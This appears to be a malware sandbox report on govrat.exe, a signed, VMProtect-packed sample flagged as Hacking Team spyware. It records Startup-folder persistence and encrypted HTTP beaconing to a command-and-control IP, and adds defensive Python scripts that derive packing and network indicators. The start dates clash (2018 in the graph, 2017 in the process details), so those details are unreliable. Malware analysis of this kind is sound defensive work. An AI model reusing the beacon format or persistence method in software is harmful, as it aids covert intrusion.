Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Process information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\govrat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

[Behavior graph image not reproduced; node data recovered from the page:]
Behavior Graph ID: 50649; Sample: govrat.exe; Startdate: 19/03/2018; Architecture: WINDOWS; Score: 56
Processes: govrat.exe (started); explorer.exe (started, two instances); ASC.exe (started by explorer.exe)
Network: 192.243.101.124, ports 49177 and 80, TIP-NETWORKS-INC (TIPNetworksIncUS), United States, contacted by govrat.exe
Dropped file: C:\Users\user\AppData\Roaming\...\ASC.exe (PE32), dropped by govrat.exe
Signatures on graph: Sample is protected by VMProtect; Found stalling execution ending in API Sleep call (sample and govrat.exe); Detected Hacking Team Remote Control System (RCS) spyware (govrat.exe)

Simulations

Behavior and APIs

Time       Type              Description
22:26:22   API Interceptor   43x Sleep call for process: govrat.exe modified
22:26:40   Autostart         Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
22:26:41   API Interceptor   7x Sleep call for process: explorer.exe modified
22:26:47   API Interceptor   1x Sleep call for process: ASC.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches


Startup

  • System is w7x64native_hvm
  • govrat.exe (PID: 3676 cmdline: 'C:\Users\user\Desktop\govrat.exe' MD5: C0618556E9EF16B35B042BC29AEB9291)
  • explorer.exe (PID: 3948 cmdline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • explorer.exe (PID: 1212 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • ASC.exe (PID: 3812 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe' MD5: 882FAC6DFE6E15AEA53D177BE51B7E26)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe
Process: C:\Users\user\Desktop\govrat.exe
File Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes): 6291472
Entropy (8bit): 7.996353658269883
Encrypted: true
MD5: 882FAC6DFE6E15AEA53D177BE51B7E26
SHA1: E8B5BF37D89A2921C0092353B0A7907FC00AF03D
SHA-256: 2A9FFF46C9EFF07F2360F6E08216A7BCA793C09A64C36D8F80CD9F8E91A288A9
SHA-512: 5B9FD1CBF214EA761EAA7929F105D97BB0172F8E4139511D2FB0E7109D2F375E1346A87C83C83193A88B34B02064C31D6EC1A14CE324701EDEE41190677686BE
Malicious: false
Reputation: low

\samr
Process: C:\Users\user\Desktop\govrat.exe
File Type: GLS_BINARY_LSB_FIRST
Size (bytes): 1014
Entropy (8bit): 4.131663370232929
Encrypted: false
MD5: D4D20EBCE40654F57B46AB722F3DBE83
SHA1: 93DF2D6CF35698290269969BD1948C2108EB3AD2
SHA-256: C5D5D099BEF01A808BD9ECD517659ECD85A164280724603B0F6393A2AA3E1ED7
SHA-512: A6956754D60EC704B9CB862D34CD5E2EA860EE3CE9781F318A81B8F6D30A444CD60DE95675AE52474D5D1DDEFFA88C0E470341FC1683CDD723923ACCB69677F2
Malicious: false
Reputation: low

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

IP                Country         ASN     ASN Name                            Malicious
192.243.101.124   United States   36454   TIP-NETWORKS-INC-TIPNetworksIncUS   false

Static File Info

General

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit): 7.880515336004999
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: govrat.exe
File size: 811992
MD5: c0618556e9ef16b35b042bc29aeb9291
SHA1: 61eda4847845f49689ae582391cd1e6a216a8fa3
SHA256: d485eaaed66a97822fd8b3317d2d61df50c1e1647ad37d6f42805b11eac37746
SHA512: a69aa5bd6d38f19eeaed6e00b9e12eee05913d4e91f02373c46872cd5c3551d0dccec7607cc7d241001b0af8e4643aeef61632d9213060d0df60e44c9f3a8327
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m@.............k.......k.......k..................]....................k.......k.......k......Rich............PE..L....a.Y...

Static PE Info

General

Entrypoint: 0x5642ba
Entrypoint Section: .vmp1
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x59DB618C [Mon Oct 09 11:46:20 2017 UTC]
TLS Callbacks: (none listed)
CLR (.Net) Version: (none)
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 370ca0394a7aeb5aeb72602950975e05

Authenticode Signature

Signature Valid: true
Signature Issuer: CN=thawte SHA256 Code Signing CA, O="thawte, Inc.", C=US
Signature Validation Error: The operation completed successfully
Error Number: 0
Not Before / Not After: 09/07/2017 01:00:00 / 10/07/2018 00:59:59
Subject Chain: CN=Ziber Ltd, O=Ziber Ltd, L=London, S=London, C=GB
Version: 3
Thumbprint: 1456D8A00D8BE963E2224D845B12E5084EA0B707
Serial: 5E15205F180442CC6C3C0F03E1A33D9F

Entrypoint Preview

The listing below is a linear disassembly starting at the entry point 0x5642ba, which lies in the .vmp1 section (entropy 7.95) of a sample the sandbox reports as VMProtect-protected. After the opening push/call, instructions such as int3, iretd, aad, in al, dx and loads of fs/ss are what a disassembler produces from high-entropy data, not the program's logic; read the listing as protector bytes, not as the original code.

Instruction
push 03595AFFh
call 0EC34A3Ch
mov byte ptr [eax+edi], dl
jmp 0EC357ACh
ret
and ebp, ecx
int3
rol dh, cl
pop esp
and ch, ah
xor eax, 8D77337Ah
shl byte ptr [ecx+27h], cl
pop esp
test dword ptr [edx+60AA2EDEh], edx
enter EB11h, E2h
cdq
les edi, fword ptr [ecx-7Ah]
dec edx
jnp 0ECC1520h
or dl, byte ptr [ebp-60h]
rol edi, 15h
jnl 0ECC14D5h
add edi, ebp
jc 159ACEF5h
loope 0ECC146Ah
cmp dword ptr [esi-71h], esp
leave
loopne 0ECC1476h
sbb dword ptr [eax-11h], ebx
mov fs, word ptr [esp-5Bh]
pop ecx
lds ebp, fword ptr [eax-14A609B6h]
aad B8h
and dword ptr [edx], esi
mov eax, 9D1DC735h
iretd
test dword ptr [ecx+2DE37F11h], A556B57Fh
and dword ptr [eax+eax*8], edx
jmp dword ptr [079B6DECh]
mov esi, dword ptr [58D39706h]
lea esp, dword ptr [ebp+4649E99Bh]
shl ebp, 1
stosd
xor dword ptr [eax], ebx
iretd
jnle 0ECC1499h
outsd
fmul dword ptr [esi-20ED2902h]
pop ss
sar dword ptr [edi+25h], 1
xchg bl, dl
sub dword ptr [edx], eax
push cs
cmpsb
in eax, dx
popfd
in al, dx
xchg byte ptr [edi], cl
sub dword ptr [ebp-56h], FFFFFFFFh
dec dword ptr [ebx+0800BFC7h]
add byte ptr [eax], al
cmp cl, bl
stc
sub edi, edx
shr edi, 05h
lea edi, dword ptr [edi+edx]
cmc

Data Directories

Name                                   Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x16b4cc          0x4f           .vmp1
IMAGE_DIRECTORY_ENTRY_IMPORT           0x179eb0          0xdc           .vmp1
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x17c000          0x12eba        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0xc5800           0xbd8          .vmp0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x17b000          0x108          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0               0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x17a020          0x40           .vmp1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x141000          0x94           .vmp1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0               0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0

Sections

Name     Virtual Address   Virtual Size   Raw Size   Xored PE   ZLIB Complexity   File Type   Entropy         Characteristics
.text    0x1000            0x1ae10        0x0        False      0                 empty       0.0             IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata   0x1c000           0x5ddf         0x0        False      0                 empty       0.0             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data    0x22000           0x4b3c         0x0        False      0                 empty       0.0             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.vmp0    0x27000           0xa0edc        0x0        False      0                 empty       0.0             IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.vmp1    0xc8000           0xb2080        0xb2200    False      0.958959703947    data        7.94598915032   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc   0x17b000          0x108          0x200      False      0.39453125        data        2.46844131471   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc    0x17c000          0x12eba        0x13000    False      0.597810444079    data        6.54796071524   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name            RVA        Size     Type                                                      Language   Country
RT_ICON         0x17c280   0x8768   PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced    English    United States
RT_ICON         0x1849e8   0x3a48   data                                                      English    United States
RT_ICON         0x188430   0x25a8   data                                                      English    United States
RT_ICON         0x18a9d8   0x1a68   data                                                      English    United States
RT_ICON         0x18c440   0x10a8   data                                                      English    United States
RT_ICON         0x18d4e8   0x988    data                                                      English    United States
RT_ICON         0x18de70   0x6b8    data                                                      English    United States
RT_ICON         0x18e528   0x468    GLS_BINARY_LSB_FIRST                                      English    United States
RT_GROUP_ICON   0x18e990   0x76     MS Windows icon resource - 8 icons, 256-colors
RT_VERSION      0x18ea08   0x358    data
RT_MANIFEST     0x18ed60   0x15a    ASCII text, with CRLF line terminators                    English    United States

Imports

DLL            Import
gdiplus.dll    GdipGetImageEncoders
GDI32.dll      DeleteDC
KERNEL32.dll   GlobalMemoryStatusEx
USER32.dll     GetMessageW
ADVAPI32.dll   CryptGenRandom
SHELL32.dll    Shell_NotifyIconW
ole32.dll      CoSetProxyBlanket
OLEAUT32.dll   SysFreeString
KERNEL32.dll   LocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA
ADVAPI32.dll   OpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle

KERNEL32.dll and ADVAPI32.dll each appear twice in the import table as the report lists it.

Exports

Name              Ordinal   Address
IsProcessParent   1         0x40fa8a

Version Infos

Description       Data
LegalCopyright    Copyright(c) 2005-2016
FileVersion       9.3.0.1121
CompanyName       (empty)
PrivateBuild      d5543e1965-81533df957-4f8b251e5d-84b718d211-42330f5c40-a942c47a31-fd2ba659a2-0bcec6dbdd-6f7c12de71-85bdf9
ProductName       Advanced SystemCare 9
ProductVersion    9.3.0.1121
FileDescription   Advanced SystemCare 9
Translation       0x0000 0x04b0
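The static tables above carry the indicators a triager reads first: four sections with a virtual size but no bytes on disk, an entry point inside a high-entropy .vmp1 section, an export whose address falls into one of the empty sections, and a valid Authenticode signature from "Ziber Ltd" on a file whose version block claims to be "Advanced SystemCare 9". The following Python is an added example, not part of the Joe Sandbox report and not the sample's or any vendor's code. It encodes those values as constructed input, copied from the Sections, Static PE Info, Exports, Authenticode and Version Infos tables, and derives the packing and masquerading indicators from them; the function names, field names and the 7.5 entropy threshold are this example's own choices, not sandbox signatures.

```python
"""Static triage over the PE metadata printed in this report.

Added example (not sandbox output). The constants below are copied from
the report's Sections, Static PE Info, Exports, Authenticode and Version
Infos tables; nothing is parsed from the binary itself, so this runs
offline without the sample.
"""
from dataclasses import dataclass

# Thresholds and name hints are this example's own choices, not Joe Sandbox signatures.
HIGH_ENTROPY = 7.5
PACKER_SECTION_PREFIXES = (".vmp",)  # VMProtect names its sections .vmp0, .vmp1, ...


@dataclass(frozen=True)
class Section:
    name: str
    va: int          # relative virtual address
    vsize: int       # virtual size
    raw_size: int    # size of raw data on disk
    entropy: float   # 8-bit entropy of the raw bytes, as the report lists it
    executable: bool

    def contains(self, rva: int) -> bool:
        return self.va <= rva < self.va + self.vsize


# Section table as the report prints it for govrat.exe (constructed input).
SECTIONS = (
    Section(".text",  0x1000,   0x1ae10, 0x0,     0.0,          True),
    Section(".rdata", 0x1c000,  0x5ddf,  0x0,     0.0,          False),
    Section(".data",  0x22000,  0x4b3c,  0x0,     0.0,          False),
    Section(".vmp0",  0x27000,  0xa0edc, 0x0,     0.0,          True),
    Section(".vmp1",  0xc8000,  0xb2080, 0xb2200, 7.9459891503, True),
    Section(".reloc", 0x17b000, 0x108,   0x200,   2.4684413147, False),
    Section(".rsrc",  0x17c000, 0x12eba, 0x13000, 6.5479607152, False),
)
IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0x5642ba                 # "Entrypoint" in Static PE Info
EXPORTS = {"IsProcessParent": 0x40fa8a}   # Exports table, ordinal 1
SIGNER_CN = "Ziber Ltd"                   # Authenticode subject CN
PRODUCT_NAME = "Advanced SystemCare 9"    # ProductName from Version Infos
COMPANY_NAME = ""                         # CompanyName is empty in the report


def section_for(rva: int, sections=SECTIONS):
    """Return the section whose virtual range covers rva, or None."""
    return next((s for s in sections if s.contains(rva)), None)


def triage(sections=SECTIONS, image_base=IMAGE_BASE, entry_va=ENTRY_POINT_VA,
           exports=EXPORTS, signer=SIGNER_CN, product=PRODUCT_NAME,
           company=COMPANY_NAME):
    """Derive packing and masquerading indicators from static metadata."""
    virtual_only = [s for s in sections if s.vsize and s.raw_size == 0]
    entry = section_for(entry_va - image_base, sections)
    export_sections = {name: section_for(va - image_base, sections)
                       for name, va in exports.items()}
    return {
        # Sections with a virtual size but no bytes on disk are filled at run
        # time: the protector stub unpacks the original code into them.
        "virtual_only_sections": [s.name for s in virtual_only],
        "virtual_only_executable": [s.name for s in virtual_only if s.executable],
        "entry_section": entry.name if entry else None,
        "entry_in_packer_section": bool(entry) and entry.name.startswith(PACKER_SECTION_PREFIXES),
        "entry_section_high_entropy": bool(entry) and entry.entropy >= HIGH_ENTROPY,
        # An export whose address lands in a section that is empty on disk
        # can only be resolved after unpacking.
        "exports_in_virtual_only": sorted(n for n, s in export_sections.items()
                                          if s is not None and s.raw_size == 0),
        "export_section": {n: (s.name if s else None) for n, s in export_sections.items()},
        # A valid signature says who signed, not that the file is benign:
        # compare the signer with the product the version block claims to be.
        "signer_named_in_version_info": signer.lower() in (product + " " + company).lower(),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key:30} {value}")
```

Running it reproduces what the tables already imply: .text, .rdata, .data and .vmp0 exist only in memory, the entry point sits in .vmp1, IsProcessParent points into the on-disk-empty .text, and the signer name appears nowhere in the version block. None of these alone proves malice, but together with the dropped Startup-folder copy they are enough to decide that the on-disk file is not the code worth analysing and that a memory dump after unpacking is.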

Possible Origin

Language of compilation system   Country where language is spoken
English                          United States

Network Behavior

TCP Packets

Timestamp                             Source Port   Dest Port   Source IP         Dest IP
Mar 19, 2018 22:26:56.784701109 CET   49177         80          192.168.0.42      192.243.101.124
Mar 19, 2018 22:26:56.784749985 CET   80            49177       192.243.101.124   192.168.0.42
Mar 19, 2018 22:26:56.785006046 CET   49177         80          192.168.0.42      192.243.101.124
Mar 19, 2018 22:26:56.787794113 CET   49177         80          192.168.0.42      192.243.101.124
Mar 19, 2018 22:26:56.787812948 CET   80            49177       192.243.101.124   192.168.0.42
Mar 19, 2018 22:26:56.788217068 CET   49177         80          192.168.0.42      192.243.101.124
Mar 19, 2018 22:26:56.788227081 CET   80            49177       192.243.101.124   192.168.0.42
Mar 19, 2018 22:26:58.239176989 CET   80            49177       192.243.101.124   192.168.0.42
Mar 19, 2018 22:26:58.286287069 CET   49177         80          192.168.0.42      192.243.101.124
Mar 19, 2018 22:26:58.286310911 CET   80            49177       192.243.101.124   192.168.0.42
Mar 19, 2018 22:26:58.286849022 CET   49177         80          192.168.0.42      192.243.101.124
Mar 19, 2018 22:26:58.286861897 CET   80            49177       192.243.101.124   192.168.0.42
Mar 19, 2018 22:26:59.300407887 CET   80            49177       192.243.101.124   192.168.0.42
Mar 19, 2018 22:26:59.300568104 CET   49177         80          192.168.0.42      192.243.101.124
Mar 19, 2018 22:26:59.300956011 CET   49177         80          192.168.0.42      192.243.101.124
Mar 19, 2018 22:26:59.300981998 CET   80            49177       192.243.101.124   192.168.0.42

HTTP Request Dependency Graph

  • 192.243.101.124

HTTP Packets

Session ID   Source IP      Source Port   Destination IP    Destination Port   Process
0            192.168.0.42   49177         192.243.101.124   80                 C:\Users\user\Desktop\govrat.exe

Mar 19, 2018 22:26:56.787794113 CET, 7 kBytes transferred, OUT:
POST /index.html HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 440
Host: 192.243.101.124

Mar 19, 2018 22:26:56.788217068 CET, 8 kBytes transferred, OUT (body shown shorter than the declared Content-Length of 440, as printed in the report):
Data Raw: 6e 70 67 57 58 6e 58 45 71 33 46 70 2b 47 63 75 61 76 6f 41 6f 77 30 65 6c 61 31 69 35 6a 6a 52 31 43 52 42 77 52 51 66 66 55 7a 2f 6d 69 50 6f 6e 44 6e 39 4a 66 36 6f 68 71 6d 6c 70 6c 2b 41 4f 36 67 61 67 30 45 57 5a 37 4f 6c 58 30 6f 70 37 75
Data Ascii: npgWXnXEq3Fp+GcuavoAow0ela1i5jjR1CRBwRQffUz/miPonDn9Jf6ohqmlpl+AO6gag0EWZ7OlX0op7umK8l/r8Aj/SACh65mvXTNjJS+QDwscjjtZ/sc3tT1MHOFoA48A4Vah8OEo9Nm8DSAGZrpU9Da6QanrYzNH7QmB4dVxKI0uiLO7fVVexYAtese0JhOwGc7RmTkcHFZnpoNLRRVfgYnWs/oAE1dB0+JWRAm8lGZNMLT

Mar 19, 2018 22:26:58.239176989 CET, 9 kBytes transferred, IN:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 19 Mar 2018 21:26:48 GMT
Content-Type: application/octet-stream
Content-Length: 304
Connection: keep-alive
Data Raw: 73 2f 45 76 54 58 55 70 31 46 37 42 77 42 31 46 70 51 50 37 46 47 44 31 32 55 6a 49 75 5a 49 71 34 6c 48 54 70 64 39 77 46 49 4b 30 35 6d 4b 2b 58 78 73 32 59 47 6f 64 43 4b 39 34 73 34 4a 54 36 55 66 51 2f 49 67 42 51 75 4f 36 71 55 48 58 6f 48 4e 58 57 30 47 6a 62 6f 61 58 4e 78 2f 48 4c 2b 47 4f 38 6b 42 77 59 73 37 6f 50 66 6f 6e 66 73 47 44 4d 53 64 42 5a 63 76 48 77 72 67 37 53 39 38 57 39 39 36 4d 31 2f 43 5a 31 2b 4f 63 68 4c 37 55 7a 6b 44 31 67 67 56 4a 32 68 32 52 44 33 41 6b 43 66 45 56 4b 31 2b 64 4c 49 53 57 33 47 57 34 45 39 77 6a 46 37 70 7a 54 55 44 75 75 2b 2b 46 38 4f 44 43 6e 2f 48 31 65 4c 4a 68 6b 4a 51 48 46 68 4a 30 71 79 49 69 59 48 63 4e 68 30 53 44 34 57 63 58 6a 48 63 58 6f 41 4d 59 67 63 71 45 68 6d 57 49 2b 67 39 4b 6b 62 70 36 79 6e 77 6c 53 77 44 76 71 63 36 42 76 61 72 6a 4c 59 4e 34 66 50 61 44 4c 56 76 66 37 4e 59 34 43 33 4e 41 6e 6c 4b 32 75 58 53 6c 6b 67 3d 3d
Data Ascii: s/EvTXUp1F7BwB1FpQP7FGD12UjIuZIq4lHTpd9wFIK05mK+Xxs2YGodCK94s4JT6UfQ/IgBQuO6qUHXoHNXW0GjboaXNx/HL+GO8kBwYs7oPfonfsGDMSdBZcvHwrg7S98W996M1/CZ1+OchL7UzkD1ggVJ2h2RD3AkCfEVK1+dLISW3GW4E9wjF7pzTUDuu++F8ODCn/H1eLJhkJQHFhJ0qyIiYHcNh0SD4WcXjHcXoAMYgcqEhmWI+g9Kkbp6ynwlSwDvqc6BvarjLYN4fPaDLVvf7NY4C3NAnlK2uXSlkg==

Mar 19, 2018 22:26:58.286287069 CET, 9 kBytes transferred, OUT:
POST /index.html HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 32
Host: 192.243.101.124

Mar 19, 2018 22:26:58.286849022 CET, 9 kBytes transferred, OUT:
Data Raw: d4 09 36 33 c9 4c 99 9f 57 7d e3 b2 c6 2c 8c a6 ca 30 39 7b 94 91 b1 4f fa 76 d5 f4 9b c5 f5 23
Data Ascii (non-printable bytes omitted by the report): 63LW},09{Ov#
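The exchange above is the most useful artefact in the report for a network detection: a POST of application/octet-stream to a bare-IP Host header, a Chrome User-Agent that omits the Accept-Encoding and Accept-Language headers a real Chrome sends, a base64-looking first request and response, and then a 32-byte raw binary POST on the same keep-alive connection. The Python below is an added example, not part of the Joe Sandbox report and not the sample's or any vendor's code. It parses the captured request bytes and computes those indicators. The request headers and the 32-byte second POST body are copied from the table, as is the complete 304-byte response body; the first POST body (440 bytes) is displayed truncated in the report and is therefore not used. Indicator names, the base64 heuristic and the entropy measure are this example's own.

```python
"""Indicators from the captured govrat.exe HTTP exchange.

Added example (not sandbox output). CAPTURED_REQUEST is the second POST as
the report's HTTP Packets table prints it (headers plus its 32-byte body);
RESPONSE_BODY is the 304-byte body of the server's reply. Both are
constructed here from the report so the script runs offline.
"""
import base64
import binascii
import ipaddress
import math
import re
from collections import Counter

CAPTURED_REQUEST = (
    b"POST /index.html HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Accept: */*\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
    b"Chrome/41.0.2228.0 Safari/537.36\r\n"
    b"Content-Length: 32\r\n"
    b"Host: 192.243.101.124\r\n"
    b"\r\n"
    + bytes.fromhex("d4093633c94c999f577de3b2c62c8ca6ca30397b9491b14ffa76d5f49bc5f523")
)

RESPONSE_BODY = (
    b"s/EvTXUp1F7BwB1FpQP7FGD12UjIuZIq4lHTpd9wFIK05mK+Xxs2YGodCK94s4JT6UfQ/IgBQuO6qUHX"
    b"oHNXW0GjboaXNx/HL+GO8kBwYs7oPfonfsGDMSdBZcvHwrg7S98W996M1/CZ1+OchL7UzkD1ggVJ2h2R"
    b"D3AkCfEVK1+dLISW3GW4E9wjF7pzTUDuu++F8ODCn/H1eLJhkJQHFhJ0qyIiYHcNh0SD4WcXjHcXoAMY"
    b"gcqEhmWI+g9Kkbp6ynwlSwDvqc6BvarjLYN4fPaDLVvf7NY4C3NAnlK2uXSlkg=="
)

BASE64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body).

    Header names are lower-cased; values keep their case.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def is_literal_ip(host: str) -> bool:
    """True when the Host header is an IP literal (optional :port stripped)."""
    bare = host.rsplit(":", 1)[0] if re.fullmatch(r"[0-9.]+:\d+", host) else host
    try:
        ipaddress.ip_address(bare)
    except ValueError:
        return False
    return True


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_body(body: bytes):
    """Return ('empty' | 'base64' | 'binary', decoded_or_raw_bytes)."""
    if not body:
        return "empty", b""
    if BASE64_RE.fullmatch(body) and len(body) % 4 == 0:
        try:
            return "base64", base64.b64decode(body, validate=True)
        except binascii.Error:
            pass
    return "binary", body


def indicators(raw: bytes) -> dict:
    """Triage indicators for one captured request."""
    method, path, headers, body = parse_request(raw)
    host = headers.get("host", "")
    ua = headers.get("user-agent", "")
    kind, payload = classify_body(body)
    browser_ua = ua.startswith("Mozilla/")
    return {
        "method": method,
        "path": path,
        "host_is_literal_ip": is_literal_ip(host),
        "octet_stream_post": method == "POST"
        and headers.get("content-type", "").startswith("application/octet-stream"),
        "browser_ua": browser_ua,
        # Chrome always sends Accept-Encoding and Accept-Language; a "Chrome"
        # UA without them is a client merely wearing the string.
        "missing_browser_headers": browser_ua
        and not ({"accept-encoding", "accept-language"} & headers.keys()),
        "declared_length_matches": headers.get("content-length") == str(len(body)),
        "body_kind": kind,
        "payload_len": len(payload),
        "payload_entropy": round(shannon_entropy(payload), 3),
    }


if __name__ == "__main__":
    for key, value in indicators(CAPTURED_REQUEST).items():
        print(f"{key:26} {value}")
    kind, decoded = classify_body(RESPONSE_BODY)
    print(f"response body: {kind}, {len(decoded)} bytes after decoding, "
          f"entropy {shannon_entropy(decoded):.3f}")
```

The response body decodes to 226 bytes, and the 32-byte request body has every byte distinct (entropy exactly 5.0 for 32 unique values), which is consistent with encrypted or random data but says nothing about the cipher; the report does not identify the protocol and neither does this script. The indicators are only worth deploying as a combination: a literal-IP Host alone is common, but a browser UA with no Accept-Encoding or Accept-Language on an octet-stream POST to /index.html is a narrow enough pattern to alert on.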


System Behavior

General

Start time: 22:26:18
Start date: 10/10/2017
Path: C:\Users\user\Desktop\govrat.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\govrat.exe'
Imagebase: 0x950000
File size: 811992 bytes
MD5 hash: C0618556E9EF16B35B042BC29AEB9291
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 22:26:40
Start date: 10/10/2017
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
Imagebase: 0x450000
File size: 2972672 bytes
MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 22:26:41
Start date: 10/10/2017
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase: 0xff5e0000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 22:26:42
Start date: 10/10/2017
Path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe'
Imagebase: 0x12c0000
File size: 6291472 bytes
MD5 hash: 882FAC6DFE6E15AEA53D177BE51B7E26
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low

Disassembly

